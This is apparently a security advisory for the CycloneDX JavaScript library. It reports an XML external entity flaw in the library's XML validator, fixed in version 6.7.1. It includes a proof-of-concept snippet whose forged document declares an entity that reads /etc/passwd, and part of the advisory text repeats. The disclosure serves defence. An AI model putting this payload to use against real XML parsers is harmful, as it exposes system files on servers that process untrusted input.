Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
const {
Spec: { Version },
Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');
const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
<components>
<component type="library">
<name>testing</name>
<version>1.337</version>
<licenses>
<license>
<id>&xxe;</id><!-- << XML external entity (XXE) injection -->
</license>
</licenses>
</component>
</components>
</bom>`;
// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
console.error('validation error', ve);
});Patches
This issue was fixed in @cyclonedx/cyclonedx-library@6.7.1 .
Workarounds
Do not run the provided XML validator on untrusted inputs.
References
- issue was introduced via #1063.
jkowalleck Coordinator
Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
Patches
This issue was fixed in
@cyclonedx/cyclonedx-library@6.7.1.Workarounds
Do not run the provided XML validator on untrusted inputs.
References